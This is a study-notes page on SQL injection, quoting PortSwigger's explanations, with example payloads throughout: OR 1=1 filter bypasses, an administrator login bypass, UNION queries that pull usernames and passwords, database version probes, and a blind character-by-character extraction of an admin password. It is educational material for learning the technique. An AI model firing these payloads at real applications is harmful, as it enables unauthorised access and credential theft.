Skip to content

SQL injection

Simple SQL query examples

http://michalszalkowski.com/api/user?id={payload1}&name={payload2}&email={payload3}&file1={payload4}&file2={payload5}

SELECT * FROM user;
SELECT id,name,email,password FROM user;
SELECT id,name,email,password FROM user WHERE id = {payload1};
SELECT id,name,email,password FROM user WHERE name = '{payload2}';
SELECT id,name,email,password FROM user WHERE name = '{payload2}' ORDER BY id ASC;
SELECT id,name,email,password FROM user WHERE name = '{payload2}' ORDER BY id ASC LIMIT 10;
SELECT id,name,email,password FROM user WHERE name LIKE '{payload2}%' ORDER BY id ASC LIMIT 10;
SELECT id,name,email,password FROM user WHERE name LIKE '{payload2}%' AND (file1 = '{payload4}' OR file2 = '{payload5}') ORDER BY id ASC LIMIT 10;

What is SQL injection (SQLi)?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack. source:portswigger.net

SQL injection examples

There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:

  • Retrieving hidden data, where you can modify a SQL query to return additional results.
  • Subverting application logic, where you can change a query to interfere with the application's logic.
  • UNION attacks, where you can retrieve data from different database tables.
  • Examining the database, where you can extract information about the version and structure of the database.
  • Blind SQL injection, where the results of a query you control are not returned in the application's responses.

Retrieving hidden data

before https://insecure-website.com/products?category=Gifts'-- 

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

after https://insecure-website.com/products?category=Gifts'+OR+1=1-- 

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Subverting application logic

before 

SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
after username = administrator' -- -lorem 
SELECT * FROM users WHERE username = 'administrator' -- -lorem' AND password = 'bluecheese'

Retrieving data from other database tables

before 

SELECT name, description FROM products WHERE category = 'Gifts'

after 

SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT NULL, NULL -- -lorem
SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT username, password FROM users -- -lorem

SQL injection UNION attacks

When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in a SQL injection UNION attack. source:portswigger.net

SELECT a,b FROM table1 UNION SELECT NULL, NULL
SELECT a,b FROM table1 UNION SELECT 'a', NULL
SELECT a,b FROM table1 UNION SELECT username,password FROM users -- -lorem

Examining the database

Select version

  • Oracle -> SELECT BANNER FROM v$version
  • MsSQL -> SELECT $$version
  • MySQL -> SELECT @@version
  • Postgres -> SELECT version()

Blind SQL injection

Many instances of SQL injection are blind vulnerabilities. This means that the application does not return the results of the SQL query or the details of any database errors within its responses. Blind vulnerabilities can still be exploited to access unauthorized data, but the techniques involved are generally more complicated and difficult to perform.

Depending on the nature of the vulnerability and the database involved, the following techniques can be used to exploit blind SQL injection vulnerabilities:

  • You can change the logic of the query to trigger a detectable difference in the application's response depending on the truth of a single condition. This might involve injecting a new condition into some Boolean logic, or conditionally triggering an error such as a divide-by-zero.
  • You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the time that the application takes to respond.
  • You can trigger an out-of-band network interaction, using OAST techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly exfiltrate data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control. source:portswigger.net
# password = abc123
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),1,1) = 'a' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),2,1) = 'b' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),3,1) = 'c' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),4,1) = '1' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),5,1) = '2' -- -lorem
... AND SUBSTRING((SELECT password FROM users WHERE username ='administrator'),6,1) = '3' -- -lorem